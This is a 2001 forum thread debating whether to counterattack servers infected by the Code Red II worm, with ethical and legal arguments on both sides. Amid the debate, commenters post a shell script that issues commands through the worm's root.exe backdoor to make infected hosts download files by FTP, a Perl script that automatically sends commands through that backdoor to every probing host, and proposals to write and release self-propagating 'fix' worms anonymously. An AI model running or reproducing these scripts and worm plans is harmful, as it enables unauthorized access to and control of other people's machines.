What does this ultimately mean? I think it's pretty clear--if I am running a service, that can be taken as either explicit (if it's setup) or perhaps implicit permission to use that service. I.e. is a random user who pulls up your default apache page on your brand new broadband box violating the law? I would say probably not (who knows, lawyers are tricky). But if you took that apache service and exploited it to get root access, have you violated the law then? Yes.

I got into this issue once trying to notify a user. They didn't have any info up, but they had sendmail up. I telnetted to sendmail, queried the service and picked up the forward for root--and then I sent mail to him. He was incredible pissed and accused me of all sorts of stuff and threatened with the police. I politely argued that's what sendmail is for (that he had gotten mad over the real world event of me dropping by his house, reading his instructions to the mailman, and sending my mail to that address instead). He was a shady character (see below).

OTOH, if I had mounted his root via NFS and left him a big JPG of my smiling face with a message, I think he would have had more of a case against me or reason to be upset. Remember, the courts aren't computers--they don't blindly execute law. So they will use some common sense about intent and rights when they judge these cases. If you did something that clearly goes against the owner's rights, stupid or not, they will probably have a case against you.

In addition, I believe the anti-computer crime laws are pretty specific. They are in favor of the owner because they are the ones who need protected by the law (since they are the "weaker/more vulnerable" party). You and I do not have to crack boxes--it is not a God-given right, a physical need, or a business requirement. Therefore, why protect people who use your systems, good intentions or not?

While altering a system's settings may not be the way to go, I do not think that sending the offender a notice is beyond the scope of ethical.

There would be nothing wrong with notifying someone that there machine has tried to comprimise your network. As a matter of fact, I do it regularly. I check my firewall logs looking for really suspicious stuff. If it comes from a computer I can trace back, I do some research; I find that most static IP attacks are comprimised machines (unless the cracker is moron--which is what I believe Mr. Angry from above was).

All that being said, I think that a law or a clarification needs to be made about port scanning. I use it as a diagnostic tool, and I usually don't use it on other machines until I'm pretty sure I have a big problem (out of courtesy to the ISP, the owner, etc). But port scanning is quickly becoming taboo. As it is, too many folks download nmap and think they have a right to scan whatever they want.



----
Veritas otium parit. --Terence
[ Parent ]
Some very good points. (none / 0) (#126)
by impto on Thu Aug 09, 2001 at 04:55:21 PM EST

However, you don't seem to see a conclusion that I and others are making.

There would be nothing wrong with notifying someone that there machine has tried to comprimise your network. As a matter of fact, I do it regularly....If it comes from a computer I can trace back, I do some research;

Why do you see it as an issue to respond directly to Code Red II attempts on an individuals machine with an alert to that person through the holes that Code Red II makes. The announcement that would be made would not alter the compromised server's settings in any way, only let them know that they had been compromised. This method ensures that only people who have been compromised by the worm get the message and it doesn't take up much bandwidth (in researching the incident or otherwise) to do so.

impto

[ Parent ]

It's about ethics (4.00 / 1) (#128)
by kostya on Thu Aug 09, 2001 at 08:55:51 PM EST

Why do you see it as an issue to respond directly to Code Red II attempts on an individuals machine with an alert to that person through the holes that Code Red II makes.

There are half a dozen ways to get a hold of the owner of a machine. I think that cracking their machine serves no purpose short of looking like a smart aleck--the computer equivalent of "nanner, nanner, look what I did!"

Trust me, people are not at ease when you contact them. People who's machines I looked up via internic still questioned me, asking how I got a hold of them. It's very violating for most--they perceive themselves as having more privacy and anonymity than they actually do.

So take that and then add to the fact that you are cracking their machine right under their nose. One, it isn't legal (you are using the machine illegally), two, it isn't ethical, and three, it's likely to make the person overreact and treat you like the enemy.

Sure it's cool to reach them by exploiting the security and writing a worm. But it's just not wise. I found poking around cool until I had enough people treat me with suspicion. Then I understood their position and sought more discreet ways.

If there is no other way to reach them, then contact their ISP. That's the legal, ethical, and boring way to do it. But it causes less headaches and avoids a lot of confusion.

Just because you can do something doesn't mean you should.



----
Veritas otium parit. --Terence
[ Parent ]
Maybe that's what these people need... (3.50 / 2) (#132)
by impto on Fri Aug 10, 2001 at 10:27:54 AM EST

...a wake up call.

It's very violating for most--they perceive themselves as having more privacy and anonymity than they actually do

They obviously don't realize that they are as vulnerable as they are. Maybe they need a little help getting acquainted to the net.

...you are cracking their machine right under their nose. One, it isn't legal (you are using the machine illegally)...

I remind you that this script is not doing the cracking. It is merely taking advantage of a 'service' that has been created by another 'program' running on the infected box (i.e. the root mappings that Code Red II instantiates). And if I access the default web page that IIS is running on most of these boxes does that qualify as illegal use of their machine? Just because the user doesn't know about it does it make it illegal, and if so does that qualify them (the ones with legal copies that is) for a class action suit against Mircosoft for having IIS run as a service by default?

...two, it isn't ethical...

I don't think that a simple "Hey, how's it going, you machine has been 0wned!" is unethical. First the aforementioned wake up call and second the undeniable viability of the crack because the message is sent from the same box that recieves it. You are obviously not a believer in hacker ethics, and I don't fault you for that. But I do point back to the point I made that the script does not create the hole.

...and three, it's likely to make the person overreact and treat you like the enemy.

Overreact how? Hopefully, by installing the patch and/or reformatting their box. And them treating me like the enemy is the least of my worries. I have already stated my doubt as to their legal ground in this matter. My concern is that they leave their box 0wned and the script kiddies grab it and start DDOS my favorite web site/me.

impto

[ Parent ]

Ok, one more time ;-) (none / 0) (#136)
by kostya on Fri Aug 10, 2001 at 01:11:24 PM EST

I remind you that this script is not doing the cracking. It is merely taking advantage of a 'service' that has been created by another 'program' running on the infected box (i.e. the root mappings that Code Red II instantiates).

Ok, you seem to be making a distinction between the act of "breaking open" a machine (i.e. installing additional services to circumvent security via an already existing hole in security) and the act of using the person's machine without explicit or implicit permission.

Now, if that's how you want to determine the ethics of the situation, that's fine--for you. But the courts and law enforcement won't giving a rip what you think is ethical or legal. Which is to say, the argument of "I didn't break into your machine, it was already broken into when I got there" will not save you in any way, shape, or form.

It's about whether you have permission or authorization to be using the machine. Period. If you use existing security holes or ones created by CR/CRII, it does not matter one iota, you are still using the machine without permission--i.e. illegally.

Now you can do whatever you want. But you might want to give a read to sil's story before charging blindly ahead and assuming that good intentions guarantee you'll be understood and vindicated. In his case, he didn't even touch the machine. In our hypothetical case (God, for your sake it better be hypothetical), we are talking about actually using the machine, placing files on it, sending messages, whatever. If you do what you propose, you will be screwed legally.

IANAL, blah, blah, etc, etc--but I have had brief brushes with trying to secure boxes and notifying other admins. Trust me--you do not want to use their machine. Port scans can almost get you brought up on charges these days (legislation in some U.S. states has been proposed); what the hell will ACTUALLY using the machine look like?

Guilty as hell, that's what.

As for a wake up call, I wholeheartedly agree that people need to be educated. My friends get cable-modems and I ask if they have a firewall--and thus begins a long lecture on how they are going to get hosed. I keep telling clients about security, and many continue to not listen. At least two have contacted me later to help them lock down their systems or do audits after they realized they had been cracked.

People need to be educated. They need to wake up and realize the internet is not Utopia-land where everyone is nice and well-behaved. But I don't think using their machine to tell them that is the most "productive" method--not to mention legal or safe. An email with a link to the MS site/patch and an invitation to drop you a line if they need any help would be a much better solution.

But then maybe I have a different perspective. I have a lot to lose if I break the law--a wonderful wife, great job, big house, lots of gadgets. Perhaps it is in my best interest to be "safe" and err on the side of caution. Do as you think best, but think about it long and hard. A criminal record is going to ruin any hope of a career (again, read sil's story--stupidity as a teen pretty much screwed him in the end, and it wasn't even computer related). In the case of sil, someone need to pay, someone's head needed to be on a platter, someone needed to go to jail. Do you really think it will matter that you did not perform the orginal exploit? If they have no one else to blame (can't trace CR), you are going to be the main focus of all their legal wrath.



----
Veritas otium parit. --Terence
[ Parent ]
This is probably going on to long.... (none / 0) (#140)
by impto on Fri Aug 10, 2001 at 04:14:44 PM EST

...but I enjoy a good argument/discussion.

The main reason I'm replying at this point is that you didn't even hit on my best point from the previous post.

Why is accessing the default web page set up by IIS when it runs as a service any different from accessing his root when I was not the one to open it. Theoretically, I could assume that he wanted to open his hard drive/operating system to the world. Or would it be just as illegal to access the default web page?

He doesn't know about either and I didn't cause either to be accessible to the outside world. Granted if I go in and damage his files/programs then I am at fault but how would sending him a message through the holes in his box be any different than viewing the web page that he doesn't know is being served up. Both are interactions between his computer and mine. Both suck up some of his resources. The only difference I can really see is that he would know about the message but I can't see how that's a bad thing.

I guess the action could be likened to SPAM inasmuch as it is not solicited, but not as much because it is a message targeted at one user who needs it.

I realize your point that it would be more tactful/legal/ethical and generally better to contact him through his ISP. However, the underlying point I'm driving at is, who is at fault for running the borked IIS server in the first place? Is it this guy who is not educated enough about his software or Microsoft for making it run as default in the first place?

impto

[ Parent ]

It is long, but it's soooo fun ;-) (none / 0) (#142)
by kostya on Fri Aug 10, 2001 at 04:47:48 PM EST

...but I enjoy a good argument/discussion.

Hehe, me too ;-)

Why is accessing the default web page set up by IIS when it runs as a service any different from accessing his root when I was not the one to open it. Theoretically, I could assume that he wanted to open his hard drive/operating system to the world. Or would it be just as illegal to access the default web page?

An excellent point. That's why I used "explicit or implicit" when talking about permission.

If some schmoe puts up a Linux box on a DSL line, it's probably going to have a default apache page up. Is accessing that page illegal? I'd say no--although some eager-beaver lawyer might make me eat those words in the future.

Webservers are for webserving--plain and simple. So back to my point about courts and intent--they are going to use their heads on this one. If you access a web server, it could be argued that webservers are for exactly that; no harm, no foul. But, if you tried to argue that because he didn't lock his machine down he was basically inviting you to peruse it's contents, you'd be in a hot kettel of fish. No judge or jury will let that one stand, and if it was the basis for a defense, you'd be in trouble.

Confession time: during a very nasty "security takedown", I started getting my firewall hammered. I was notifying comprimised servers, and I assume the crackers saw my probes and traffic on several machines and starting putting two and two together to make five. So I "fought" back and started tracing back probes on my firewall in addition to the traffic logs I had from a client. I got a hold of a server in another state. It was probbing my samba ports and nfs ports.

I did a drive-by via ping and traceroutes, then an nmap port scan, and found out I had an NT box. I see that the SMB share ports are up. I think to myself, "No frigging way they could be that stupid." For kicks, I fired smbclient at it and asked it to list its services. Wham! It gives me the ENTIRE domain: workstations, workstation descriptions, shares, etc.

Well, hell, at this point, it was obvious why they were cracked. So I go looking for contact info, but I couldn't find any. But I do see a link for this guy on the web page (an "employee") and I see his name attached to one of the workstations in the SMB listing. So I take his email off the site and send him an email explaining that he should check his system because it's not being nice to my system.

Well, my wording was friendly, but the fact that some stranger over 2,000 miles away knew which computer he was using and was talking about cracked machines made them assume I was threatening them. As it was, my attempts to make the seriousness of the matter (and explaining that I had helped shut down a dozen other comprimised servers) made me sound like the enemy and they started accusing me of all sorts of stuff. On top of that, this guy was THE BOSS, and he beat the tar out of his consulting firm, who in turn took it out on me.

Was I in the wrong: ethically, yes--even if I didn't realize it at the time. Just because some dork doesn't have enough brains to NOT expose his entire Windows network filesystem to me doesn't mean I should look at it. I should have seen the port open (via nmap), noted it, and sent an email explaining what I had seen. Mentioning that I could see their networks just made someone look like an ass.

Which, honestly, was my purpose. I couldn't believe how colossally stupid they had been. But my eagerness to be smart and clever did not help things. If I had realized this up front, I would have tried just a little harder, and I would have probably found the consulting company's contact info. As it was, I got someone in big trouble and for what? To make myself feel cool?

So now I'm a big "play nice" guy. Granted, the guy was totally at fault, but the anger I got on the phone was pretty intense. At that point, I realized that someone properly motivated with a lawyer could make my life a living hell--when I was doing the "right" thing! I took up the CYA approach from that point on, being extra careful and logging all my terminal sessions.

He doesn't know about either and I didn't cause either to be accessible to the outside world ... The only difference I can really see is that he would know about the message but I can't see how that's a bad thing.

Again, I'm all for sending him a message. Please do! But I think you should limit it to email. Something like "I got CR probes from your machine. I traced it back and found you had a CR web page up. Do you know that your machine is comprimised?" is a helluva lot nicer to find than a message in the NT service log saying "Yo! You've got CR. I shutdown IIS for you."

In theory, both are notification and both do no damage. But one will land you in jail (potentially) because you crossed the line from observing the machine to using the machine.

However, the underlying point I'm driving at is, who is at fault for running the borked IIS server in the first place? Is it this guy who is not educated enough about his software or Microsoft for making it run as default in the first place?

Clearly he is at fault for running a poorly managed server. And, if he did enough damage, you could sue him for negligence. But accessing his machine in "retaliation" isn't a good idea.

I know we all want to "school" the "lusers", but it is a bad idea career-wise, and it is really childish when you look at it (I admit that in myself).



----
Veritas otium parit. --Terence
[ Parent ]
Not the answer I wanted. (none / 0) (#143)
by impto on Fri Aug 10, 2001 at 05:20:03 PM EST

It was a nice story though.

I haven't used such a script and didn't really ever plan to. I just enjoy a good discussion as I guess I can fairly call what we just had, although I may have been a little overboard with my first post.

I still think that Microsoft should take a little of the blame for all these shenanigans.

BTW...I really like the layout and design of your web page. After reading all your posts I decided it wouldn't be too much trouble to check it out ;-).

At anyrate thanks for the verbal/keyboard work out.

impto

[ Parent ]

A much better solution. (5.00 / 1) (#86)
by harik on Wed Aug 08, 2001 at 06:18:43 PM EST

If you comprimise their system to patch it, you have comprimised their system. You have broken into their property and modified it without telling them. It's not a good idea, it isn't ethically, and on top of that, it is illegal--intentions or no.

So, obviously, the solution is that _YOU_ arn't the one to do it.

release another CR varient, one that patches the server, then puts a cgi in place of default.ida that "fixes" whoever attempts to connect to it.

seed a few of these here and there, and you'll see an exponential dropoff in CR infections. Since it's not self-propagating, it won't cause massive bandwidth problems. It simply kills any worm that attempts to connect to it.

Lets face it, nobody's figured out who launced CR1, or seeded the networks with CR2. So it's unlikely that you'll get caught.

--Dan

[ Parent ]

Not really. (2.25 / 4) (#87)
by kelkemesh on Wed Aug 08, 2001 at 06:31:55 PM EST

seed a few of these here and there, and you'll see an exponential dropoff in CR infections. Since it's not self-propagating, it won't cause massive bandwidth problems.

If it's not self-propagating, it will have only a linear effect on the infection - and until the infection starts to saturate the set of susceptible machines and ceases to grow exponentially, this countermeasure will just be a drop in the bucket.

Also, a countermeasure that propagates just to machines attempting infection won't cause bandwidth problems at all - it'll alleviate them by shutting down the infection vector of CR.

[ Parent ]

BIG MONEY (none / 0) (#154)
by b0fh on Wed Aug 15, 2001 at 10:14:43 PM EST

So, can I sue $BIGMONEY for my wasted bandwith? NO, because I don't ever live in the States (where $BIGMONEY prolly is ;-). All I can do is sit down and suffer from it.
My will is to simply destroy those machines (maybe having machines totally screwed up would make people open their eyes on how BAD is M$ software, and how their policy of "scripting everywhere" and "enable all that useless crap by default" is a BAD THING(TM)). Maybe it can even make people start looking for a better product (apache?) when it comes to WWW serving.
Of course, destroying machines is also bad, so we, as responsible people, don't do that (but I bet there are people doing that and laughing their asses of). Guess Im simply stuck with it then. I don't see this stopping by itself whith that whole crowd of winlusers out there running their pirate copies of windows and not having a clue...


--
--
"Contrary to popular belief, UNIX is user-friendly. It just happens to be selective on who it makes friendship with"
[ Parent ]
Vi (2.71 / 7) (#66)
by spinfire on Wed Aug 08, 2001 at 02:46:02 PM EST

In the poll, you've got EMACS but no Vi! shame shame shame on you, you, you, editor fascist you!

Freelance Hacker. spinfire on FooNET.
Not possible. (2.20 / 5) (#71)
by gblues on Wed Aug 08, 2001 at 03:43:19 PM EST

There's no way this is going to work.

For Code Red I computers, the best you can hope to do is reboot them. Of course, they'll get hit again within a few seconds, so this is a waste of time in the extreme.

For Code Red II computers, you need to be able to:

  1. modify the registry to remove the virtual paths to the root directories
  2. delete the bogus c:\explorer.exe
  3. delete all copies of root.exe
  4. patch IIS to prevent another exploit
  5. reboot the computer.
Good luck, especially since the root.exe used to get in won't be deleted (you'd need to somehow arrange for it to be deleted during the reboot). Not to mention that using a remote exploit to gain unauthorized access is highly illegal, even if the intention was good.

How did this story get posted, much less on the first page??

Nathan


... although in retrospect, having sex to the news was probably doomed to fail from the get-go. --squinky
Not really that hard. (3.50 / 2) (#76)
by delmoi on Wed Aug 08, 2001 at 04:50:04 PM EST

modify the registry to remove the virtual paths to the root directories

Not very hard at all

delete the bogus c:\explorer.exe

"Del C:\explorer.exe"

delete all copies of root.exe (you'd need to somehow arrange for it to be deleted during the reboot)

FileCopyEx is your friend

patch IIS to prevent another exploit

Download the pach and install it. Or just delete default.ida.

reboot the computer.

And that's supposed to be hard?
--
"'argumentation' is not a word, idiot." -- thelizman
[ Parent ]
re: "Del C:\explorer.exe" (none / 0) (#118)
by Garc on Thu Aug 09, 2001 at 12:12:12 PM EST

This will most likely give you some sort of a sharing violation. On the machines I've seen infected, the bogus explorer had to be stopped before it could be deleted. You can open up task manager, and kill the process that has only 1 thread. Then you may delete c:\explorer.exe I don't know how much this changes the "hardness" of it, b/c I've never tried to kill a process in NT/win2k w/o the task manager.

garc
--
Tomorrow is going to be wonderful because tonight I do not understand anything. -- Niels Bohr
[ Parent ]

Hrm,... (none / 0) (#79)
by QuoteMstr on Wed Aug 08, 2001 at 04:55:42 PM EST

This may seem strange, but why not just infect Code Red I infected computers with Code Red II so you can patch them?

[ Parent ]
Very Interesting Social Impact (3.00 / 1) (#74)
by Mad Hughagi on Wed Aug 08, 2001 at 04:40:00 PM EST

Regardless of the legality and/or ethical basis for writing this script, it is interesting to see that Scott Robinson's comment is rated very high while most of the shouting seems to be against this effort.

If you do write a successful "Code Blue" script, and it does not infringe on the majority of people to the degree where they feel threatened, it could very well make you one of the most famous people in western tech-culture. If you did it anonymously at least you would have the personal satisfaction that you implimented a very influentual immune system type response on the net.

I'm all for it. If a machine is going to try to fuck you over, and if the operators only saving grace is negligence or ignorance, then they should have no qualm with being dealt with in a quick and well-intended response.

Let 'er rip, Cheers from the Hughagi Quarter.


HUGHAGI INDUSTRIES

We don't make the products you like, we make you like the products we make.

Wild West (none / 0) (#123)
by squee on Thu Aug 09, 2001 at 03:21:01 PM EST

The internet is like the Wild West, and "Code Blue" is vigilantie* Justice.

Im a formin' a lynch mob and goin' to string up the Redmond Posse!


(I do not condone mob rule and the death penalty, but computer negligence should be a crime like any other negligence).

*i wish k5 had a spellcheck

[ Parent ]
Interesting Challenge (3.00 / 1) (#84)
by xriso on Wed Aug 08, 2001 at 05:44:30 PM EST

I have already considered doing this, but I cannot proceed without more information on the NT/2000 boot process. Does it have an autoexec.bat?

The way I would prefer is the following:

Set up boot process so that it displays the following message, and waits for a key, before the web server is started:
Your computer is vulnerable to the Code Red or CodeRedII worm. Go to http://www.incidents.org for more information. This message will only display once, unless it is detected that you are still vulnerable.

Press any key to continue...

This would be simple and effective. It stops the infection process (web server is not running), and gets the administrator's attention. If one really wanted to be nasty, one could integrate the propogation code with this, so that it spreads all over the net, with a 2-hour period between infection and reboot. For anonymity, you could simply make your worm the same size as CRII and access logs couldn't tell the difference! (or maybe they could - I don't know much about IIS)
--
*** Quits: xriso:#kuro5hin (Forever)

This is a very good idea. (5.00 / 1) (#92)
by Mad Hughagi on Wed Aug 08, 2001 at 07:01:26 PM EST

The only ethical hanging point is that you would be running software on someone else's machine without their prior consent, but in this case I think propagation of a white-hat script would definately do a lot to further the concept of a "hacker" or "cracker" in today's society.

I liken the analogy to a car recall. While CR2 doesn't have quite the same ability to cause damage as faulty radials, it does have the same potential for being fixed, and if M$ isn't going to do anything about it I think concerned members of the society should do what they can to remedy the situation.

It's about time M$ started getting a bit more liable for their software, if they are going to sell it for profit. Imagine Ford realized that it's key mechanism on the ignition could start with any key? They would have nothing against someone showing up and in one fell swoop fixing all of the broken mechanisms in the most efficient means possible.

To say that this sort of solution is unethical is an outrage to the betterment of society as a whole. We all use and share the internet, anything that inteferes with it's operations should be dealt with through the same concern that we would have if any other part of our infrastructure was damaged. What's that? Someone let a giant bulldozer loose on the interstate?

The only difference here is that it is a well-intentioned individual that would be solving the problem as opposed to the government.


HUGHAGI INDUSTRIES

We don't make the products you like, we make you like the products we make.
[ Parent ]

picking nits (none / 0) (#95)
by shoeboy on Wed Aug 08, 2001 at 08:17:01 PM EST

I have already considered doing this, but I cannot proceed without more information on the NT/2000 boot process. Does it have an autoexec.bat?

No, it does not. All configuration info is either in boot.ini (very minimal) or in the registry. Furthermore, during the text mode (blue screen of startup) part of the startup process, only NT native api applications can run. You need microsoft's driver development kit to write native api apps and the api is not documented anywhere unless you sign a big NDA and give Microsoft a lot of money. You could display a message that way, but it's just not worth it. Once you're into gui mode you can run win32 apps and send popups, but they won't be visible until someone logs on to the box. You could always change the default background from green to a .bmp with your message though. Probably the best method of getting someone's attention.

--Shoeboy
No more trolls!
[ Parent ]

hrm (none / 0) (#96)
by xriso on Wed Aug 08, 2001 at 08:37:56 PM EST

At first I was considering a boot-sector thingy, as those are pretty easy to make, but then I realised that some BIOSes complain when it is altered. Then again, that would also serve as a notification that some sort of viral activity was taking place.

That background .bmp sounds like a neat idea. Harmless, effective, simple, and reasonably small.
--
*** Quits: xriso:#kuro5hin (Forever)
[ Parent ]

gpl (2.00 / 4) (#99)
by ShrimpX on Wed Aug 08, 2001 at 09:17:51 PM EST

I've been thinking about this for a while... I think that we should write a worm that knows every possible windows "bad" worm/virus, including VB scripting vulerabilites, and fixes the majority of existing bugs on win machines cleanly and nicely.

And then license it under the GPL and never launch it.

Though this is not physically possible, it would be interesting to see MS unable to clean up Windows because they refuse to open source.

File download script, etc. (4.00 / 3) (#107)
by nebby on Thu Aug 09, 2001 at 02:39:31 AM EST

The night Code Red 2 came out I stayed up with some Mountain Dew to see if I could come up with a way to fix these servers. First of all, something people have failed to mention is if they've managed to actually get IIS to shut down. I can't get it to work, it simply stays up no matter what I try ("net stop w3svc," etc.) I think root.exe has restricted permissions which do not allow it to:

- Access the desktop (so all these neat things which pop up web pages have not been working, sorry guys)
- Stop/start services
- Access files outside of the current directory

This is what I've been able to guess from just messing with it remotely, I don't have an infected box to test. I read in /. comments others have confirmed these things.

It can run other programs. I am not going to put anymore time into this, but I figured I might as well post what I did get working, a file download script which can be used to download files from an ftp site to the infected server. I was using this to attempt to download and execute shutdown.exe from the NT service packs, as well as the IIS patches, but they didn't seem to work when I ran them. The downloads work though, so feel free to use this in whatever persuits you find necessary, though I can't say I think it's a good idea for you legally :)

#!/bin/sh
# Code Red ][ Download File script
# Usage: dlfile.sh [infectedIP] [file]
#
# Please set the $FTP and $DIR values to
# the ftp and directory of the patch and shutdown repository
# The default ones are set to ftp.yourftpsitegoeshere.com and /your/directory
# The percent encoding is a double check to make sure no funny NT commandline stuff causes it to break

FTP="ftp%2eyourftpsitegoeshere%2ecom"
DIR="%2fyour%2fdirectory"

echo GET /scripts/root.exe?+%2fc+echo+bin+%3etmpfile | telnet $1 80
sleep 1
echo GET /scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3etmpfile | telnet $1 80
sleep 1
echo GET /scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfile+$FTP+%3edlfile%2ecmd | telnet $1 80
sleep 1
echo GET /scripts/root.exe?+/k+dlfile%2ecmd | telnet $1 80

Argh. What a pain. Why can't K5 have a "plain text" option which recognizes HTML tags but doesn't require the insertion of P and BR tags? Am I missing something?


Half-Empty: A global community of thoughts ideas and knowledge.

Nice try (none / 0) (#145)
by Mulad on Sat Aug 11, 2001 at 01:02:26 PM EST

Hmm. Nice try, but you need to have two newlines at the end of HTTP commands, not just one.

[ Parent ]
The real fear (2.66 / 3) (#110)
by neier on Thu Aug 09, 2001 at 05:14:50 AM EST

I've had a couple of random thoughts on CRII.

Has anyone realized the potential for script kiddies to use the root.exe as a gateway to make even more and more copies (of indeterminate names) in the web root directory? Yeah, the CRII patches all remove root.exe; but what about any other copies that have been made before the inoculation ??

Another thought -- in order to promote compatibility with the Windows people, shouldn't everyone running Apache redirect default.ida to a cgi-script that makes HTTP requests to seven randomly chosen hosts? I mean, standards are standards... :-)

Re: The real fear (none / 0) (#111)
by erlando on Thu Aug 09, 2001 at 05:59:47 AM EST

Has anyone realized the potential for script kiddies to use the root.exe as a gateway to make even more and more copies (of indeterminate names) in the web root directory? Yeah, the CRII patches all remove root.exe; but what about any other copies that have been made before the inoculation ??

That's exactly why everyone writes "The server is to be considered totally compromised and should be reformatted after removing data (not executables)" or words to that effect in their security advisories.

Removing root.exe doesn't quite cut it either. To close the backdoor you also need to remove the virtual directories mapping c: and d: and re-enable file-protection. Amongst other things.

Of course none of this would have been necessary if everyone heeded to the advisories.. ;o)

[ Parent ]
Re: The real fear (none / 0) (#113)
by neier on Thu Aug 09, 2001 at 09:15:21 AM EST

Heh. Any guess on the number of people who actually follow through to the "format your hard drive" step of the remedy? After all these are the same ones who couldn't be bothered to download an IIS update....

As an aside, yesterday CRII found its way inside our firewall at work (large multinational). I applaud our IT staff's warning, as it hit my in-box at about the same time the first default.ida was showing up in our local apache log file; but their remedy only involved patches and reboots. I don't recall seeing a format (or even a mass deletion) mentioned anywhere. Of course, I wasn't paying too close attention; but "format" is a word I think I would remember. ;-)

[ Parent ]

my idea... but i dont have time/skill to impliment (3.00 / 1) (#114)
by chutzpah on Thu Aug 09, 2001 at 11:08:30 AM EST

I am not a windows programmer, and i don't have the time or drive to learn, but my theory for this is:

make a worm that would listen for code red exploit attempts and when it detects one, connect to the machine that tried the exploit, install itself on the machine usinbg the hole that code red uses, then proceed to eliminate code red II from memory, registry and disk (cleaning up all the damage it does) then disable IIS, putting itself in the boot procedure to keep IIS off until it is patched. Then proceed to listen for code red attempts, propigating itself to any machines that it finds.

This could eliminate the code red problem fairly quickly and will not create another problem with another worm because it is a passive worm rather than an active one.

Another thing that could help is if someone wrote a mod for apache to make it send the anti-code red worm to any machines that try to propigate code red.

CoreWars anyone? (3.00 / 1) (#115)
by DigitalQuartz on Thu Aug 09, 2001 at 11:08:59 AM EST

Anyone remember that old game CoreWars where you'd write viruses in pseudo-asm and then let them battle it out? :)

What you need to do is nab the source for code red, re-write it so that when it infects a system, it nukes other copies of code red running, and patches the system, and then tries to infect other machines for a limited time. But, as we learned in CoreWars, you need to make your virus more effective than the original code-red. Since it patches the system, it prevents code-red from re-infecting the system, so eventually you should kill off code-red.

The only thing I can think of wrong with this is that there's some ethical implications involved in patching someone else's machine. There may be someone out there somewhere with a perfectly legitimate reason for not patching their machine with the M$ patch (although I can't think of one, and I suppose their machine would just be contributing to the problem...)


A Less Illegal Action (4.00 / 2) (#117)
by cwalsh on Thu Aug 09, 2001 at 11:43:27 AM EST

There's been all this talk about going around and remote administrating these infected boxes. The problem, that has already been discussed to death, is that its ethically questionable and very illegal to do so.

So what are we supposed to do? Sit around and wait for these lazy wankers to not fix their systems, and bring about the End Of The Internet(tm)?

Our Apache logs are filled with all of these lovely IP addresses of the infected machines. Why not attempt to send a friendly email to the administrator address of the box? Sure, not all of these machines are running email services, and the administrator might get offended at your telling them that they don't know what's happening on their machine, but then again, you probably wouldn't end up in jail because of an innocent email. Hell, I mean, if someone was unintentionally pointing a gun in your direction, wouldn't you tell them to stop pointing it at you and that they should read up on proper gun safety? (sorry for this possibly poor analogy, but its the best I could do without coffee :)

I see at least two problems arising from this:
  • Autospam: If 50 people's computers all automatically send email to a single infected machine, it would probably anger the admin.
  • "Don't Tell Me How To Admin!": We get a whole lot of angry admins who don't like you anymore
A possible solution for point one would be to set up a sort of distributed.net style system, whereby a client side program, monitoring Port 80/the Apache log files would send a list of Code Red IPs to a central database. Any not in the database are added, and its the client's responsibility to email those machines.

For point two, just word the boilerplate email in a very friendly, sort of, "Just in case you didn't know" manner. Hopefully this would defuse any potential tempers.

Anyways, that's it. I know its probably a crazy idea, but I think its certainly a damn sight better than inaction, and much less invasive than creating a "Code Blue". Regardless, if anyone thinks this is workable, go nuts, my idea is your idea, and all that.

Colin

Or you could... (5.00 / 2) (#119)
by Garc on Thu Aug 09, 2001 at 12:22:58 PM EST

do grep default.ida /apache/ | mail -s 'APACHE' logredalert@dsheild.org As you can read about here, they hope to contact the admins of the machines. Sending them to dsheild ensures that there will be minimal duplication and that the messages will be professional, courteous and informative.

garc
--
Tomorrow is going to be wonderful because tonight I do not understand anything. -- Niels Bohr
[ Parent ]

Scary... (3.00 / 1) (#125)
by univgeek on Thu Aug 09, 2001 at 04:07:05 PM EST

I am not a Comp expert...

But is there really no way to stop IIS alone or something? What if they were running some other processes on these systems? Why should every process be killed because you want to stop the machine from propagating CR II?

I would think that a saner reaction would be to may be disable the access for that process, or maybe block 80 for the machine.

May be what I am saying is too difficult. But it seems to me, to be pretty scary thinking of any critical processes running on these systems.

Although any one running any critical processes on IIS and leaving it unpatched is asking for it.


Arguing with an Electrical Engineer is liking wrestling with a pig in mud, after a while you realise the pig is enjoying it!

For those that want to.... (4.00 / 4) (#127)
by impto on Thu Aug 09, 2001 at 05:16:44 PM EST

http://www.dynwebdev.com/codered/

is the url for a GPL'd script that does just as we have been discussing here. It is written in Java and is available in *nix and Windows varieties. The JRE2 is required.

If ethics and legal disregard allow, download and use at your own risk.

impto

Something like this.... (4.00 / 2) (#131)
by mtl on Fri Aug 10, 2001 at 08:27:39 AM EST

1. Create a fifo, mknod /var/log/apache/apache.fifo
2. Make apache send it's access logs to it
`CustomLog /var/log/apache/apache.fifo common'
3. Run the following perl.

#!/usr/bin/perl -w
#
# Script to retaliate against Code Red Attacks

use Socket;

$fifo = "/var/log/apache/apache.fifo";
$httplogfile = "/var/log/apache/access.log";
$wormlogfile = "/var/log/apache/codered.log";
$win_commandA = "GET /scripts/root.exe?+%2fc+net+send+*+Your+Machine+";
$win_commandB = "+is+infected+with+the+CODE+RED+Worm.Your+machine+has+just+tried+to+attack+mine.+You+should+shutdown+IIS+and+install+the+patches+available+from+Microsoft+or+better+still+install+Linux";

#
# Shouldn't need to do anything below here
#

open (FILE, "<".$fifo) or die "cant open fifo";

while (10 > 1){
while (<FILE>){
&httplog;

if ($_ =~ m/default.ida/){
$ip = ((split " ", $_)[0]);
open (LOGFILE, ">>".$wormlogfile) or die "cant open logfile";
&logit;
&attack;
close LOGFILE;
}
}
}

# Will never get here
close FILE;
exit 0;

sub httplog {
# create normal http log
open (HTTPLOG, ">>".$httplogfile) or die "cant open http logfile";
print HTTPLOG $_;
close HTTPLOG;
}

sub logit {
# Log compromised machine
$date = ((split " ", $_)[3]);
print LOGFILE $date," - ",$ip," - ";
return 1;
}

sub attack {
# Attack compromised machine
print LOGFILE "Attacking ... ";
local $proto = getprotobyname('tcp');
socket(osock, PF_INET, SOCK_STREAM, $proto);
local $sin = sockaddr_in(80, inet_aton($ip));
connect(osock,$sin) or &attack_failed;
print osock $win_commandA.$ip.$win_commandB;
close (osock);
print LOGFILE "done\n";
return 1;
}

sub attack_failed {
# If Attack Fails
open (LOGFILE, ">>".$wormlogfile) or die "cant open logfile";
print LOGFILE "connection refused\n";
close LOGFILE;
return 1;
}



"Attacking"? (none / 0) (#133)
by SEWilco on Fri Aug 10, 2001 at 11:06:15 AM EST

Your code has an attack function. Is it an attack when you're only issuing a warning? You happen to be issuing the warning only to machines which are infected with Code Red II.

[ Parent ]
I would but... (3.00 / 1) (#134)
